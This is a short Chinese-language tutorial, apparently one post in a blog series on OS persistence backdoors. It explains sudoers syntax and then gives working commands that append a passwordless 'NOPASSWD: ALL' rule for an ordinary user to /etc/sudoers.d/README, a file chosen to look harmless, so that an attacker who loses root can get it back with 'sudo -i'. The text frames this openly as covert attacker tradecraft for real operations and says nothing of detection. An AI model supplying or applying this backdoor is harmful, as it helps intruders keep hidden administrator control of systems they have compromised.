系列文章
操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门
sudoers利用后门
此后门用于在丢失root用户身份时,重新获得root身份
sudo命令可以使用户临时获得管理员权限执行命令,sudo的控制都是基于sudoers文件来控制的,里面限制了用户名,用户组,执行什么等。
/etc/sudoers的通用格式为:user host runas command user:一位或几位用户,在/etc/group中可以用一个%代替它,组对象的名称一定要用百分号%开头。
host:一个或几个主机名;runas:作为哪个用户运行,常见选项是root和ALL command:想让用户或组运行的一个或几个根级别命令。
例如:hans ALL=(root) useradd,userdel 授权hans用户在所有计算机上以root身份运行useradd,userdel命令。
这样我们用一句话将内置/或者我们自己添加的普通权限用户添加到sudoer列表中,这样就可以偷着执行管理员权限的命令了。将原本低权限用户当做后门使用。
首先我们先要去编辑/etc/sudoers.d/README文件
vim /etc/sudoers.d/README
执行下命令向文件中添加内容
sudo su -c "echo 'xiaowang ALL = NOPASSWD: ALL' >> /etc/sudoers.d/README"
这里的 xiaowang是你丢失root权限后用来取回root权限的普通用户
cat /etc/sudoers.d/README
此时我们切换为普通用户xiaowang以模仿实战中我们丢失了root身份
然后我们执行
sudo -i
重新拿回root身份
